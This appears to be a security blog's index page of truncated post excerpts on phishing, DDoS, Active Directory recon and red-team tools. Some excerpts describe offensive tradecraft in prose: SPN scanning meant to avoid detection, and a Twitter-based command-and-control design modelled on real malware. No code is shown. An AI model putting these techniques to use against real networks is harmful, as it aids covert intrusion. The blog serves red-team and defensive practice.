Anatomy of a Spear Phishing attack

Competent IT network admins have upped their security game. They’re constantly on the lookout for news on vulnerabilities, implementing necessary vendor patches and updates with gusto, and even scanning their own systems for open doorways and weaknesses. This is all good and necessary stuff. The upshot is that perimeter defences are strong, there’s a diminishing attack surface and criminals are finding it increasingly difficult to locate low-hanging fruit. THE FLIP SIDE As with the famous Maginot Line, criminals are going around the wall and targeting the ‘meatware’ or ‘human OS’. Every single day, grim news headlines confirm the above assertion. Given Read More

2015: The year of collaboration against online crime

In 2015, news of data breaches – ever larger in size and grimmer in nature – hit the mainstream media in a seemingly never-ending wave. It’s no wonder many within the information security industry feel beset on all sides; adopting a siege mentality is forgivable. I won’t bore you with in-depth discussion of the psychology of negativity bias – suffice to say, we are wired to be drawn more towards bad news than good. As a result, media outlets cater to our proclivity and we, in turn, focus ever more on the negative over the positive news in a self-reinforcing cycle. This Read More

Service Principal Name Scanning Active Directory

Dropping these notes here as a reminder for myself and might be useful for you: Scanning for services within Active Directory is best done utilising existing functionality to avoid detection. This is best achieved through Service Principal Names. Sean created a resource page of useful SPNs: His Active Directory recon code is here. And this is a talk given by Sean earlier this year entitled: Red vs. Blue: Modern Active Directory Attacks & Defense

Don’t be distracted by the DDoS flashbang

Distributed denial-of-service (DDoS) attacks are on the rise and have been for some time. Report after report show not only the growth in such attacks, but the scale, multi-vector nature and complexity is on the increase. The above is of no surprise when you consider the advent of a new acronym: ‘DDoSaaS’ or DDoS-as-a-service. Put simply, rent a bot from a bad guy, complete with a considerable number of already compromised ‘zombie’ machines, and aim it at your target. DEFENDING AGAINST A DDOS ATTACK These attacks are notoriously difficult to defend against. With a ‘zombie army’ of IP addresses, IP blocking Read More

Command and Control Using Powershell and Twitter

Initially I wanted to update and extend @obscuresec‘s Powershell Twitter Bot, the problem is this was written in early 2013 and relied on Twitter’s API 1 which required no authentication. The current Twitter API 1.1 does require authentication and encryption and although doable from the perspective of Powershell, the code is far too verbose for my purposes. With these hurdles I took a closer look at the modus operandi of the Russian criminal group using Hammertos and they avoided using the API and had the code simply reach out to the URL of the Twitter handle and look for a hashtag. I though this Read More

A Few Good Infosec Blog Links

The below are some links posted over the last few days by my Infosec Blogs Twitter account that caught my attention: Sheets on Sheets on Sheets (Cheat sheets for PowerView, PowerUp and Empire) – By @harmj0y Protecting Windows Networks – Dealing with Credential Theft – By @dfirblog Wi-Fi routers – the internet’s next Archilles heel – By @DavidLWaterson Thoughts on Exploiting a Remote WMI Query Vulnerability – By @mattifestation Developing an Enterprise IPv6 Security Strategy / Part 1: Baseline Analysis of IPv4 Network Security By @Enno_Insinuator Anonymous Versus Da’esh: It’s OPCARTEL All Over Again – By @krypt3ia 84% of consumers think companies should be held responsible for data security Read More

Raphael Mudge’s Advanced Threat Tactics Course

Going through Raphael Mudge’s Advanced Threat Tactics Course videos and blog post is akin to rummaging through treasure. Although this is a showcase for Cobalt Strike which is a *must have* tool for IT security Red Team operations and Adversary Simulation, it is so much more. For me, this course catapulted and solidified my thinking and is the pre-eminent single source of information for not only the tools of advanced threat simulation, but the underlying methodology and tradecraft. I’ll make no bones about it, I consider Cobalt Strike a masterpiece put together by a craftsman, and In case you think I’m going overboard, harmj0y described Read More

Book Review – Red Team How to Succeed By Thinking Like the Enemy

The truth is, I’m only partially through reading this book, but it is so good that I need to share this with you now to remove the mental “Blogging tic” and be totally free to absorb its goodness. The book is: Red Team How to Succeed By Thinking Like the Enemy, published in November and written by Micah Zenko. Zenko has a lucid, logical, vivid, easy writing-style, and the book is grounded in facts and littered with real-world examples, borne out of hundreds of interviews with Red-Team practitioners.  . Zenko has piercing observational skills, which enables him with sniper-like precision to Read More